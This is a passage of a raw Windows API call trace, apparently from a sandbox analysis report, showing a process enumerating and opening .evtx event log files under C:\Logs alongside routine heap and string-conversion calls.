Size=0x80) returned 0x6ea48 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.715] AreFileApisANSI () returned 1 [0087.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82688 [0087.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 66 [0087.715] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0087.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.715] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0087.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.716] AreFileApisANSI () returned 1 [0087.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx", lpUsedDefaultChar=0x0) returned 53 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0087.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.717] AreFileApisANSI () returned 1 [0087.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0087.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 53 [0087.717] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.717] GetFileType (hFile=0x424) returned 0x1 [0087.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.717] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.717] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.717] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.718] CloseHandle (hObject=0x424) returned 1 [0087.718] AreFileApisANSI () returned 1 [0087.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0087.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 53 [0087.718] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.718] GetFileType (hFile=0x424) returned 0x1 [0087.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.718] CloseHandle (hObject=0x424) returned 1 [0087.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.719] AreFileApisANSI () returned 1 [0087.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0087.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 53 [0087.719] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0087.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.719] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx", cAlternateFileName="MIFF83~1.EVT")) returned 1 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0087.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0087.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0087.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0087.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.721] AreFileApisANSI () returned 1 [0087.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx", lpUsedDefaultChar=0x0) returned 57 [0087.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0087.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.721] AreFileApisANSI () returned 1 [0087.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0087.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0087.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 57 [0087.721] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.721] GetFileType (hFile=0x424) returned 0x1 [0087.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0087.721] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.722] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.722] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.722] CloseHandle (hObject=0x424) returned 1 [0087.722] AreFileApisANSI () returned 1 [0087.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0087.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0087.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 57 [0087.722] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.722] GetFileType (hFile=0x424) returned 0x1 [0087.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0087.722] CloseHandle (hObject=0x424) returned 1 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.723] AreFileApisANSI () returned 1 [0087.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0087.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0087.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 57 [0087.723] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: 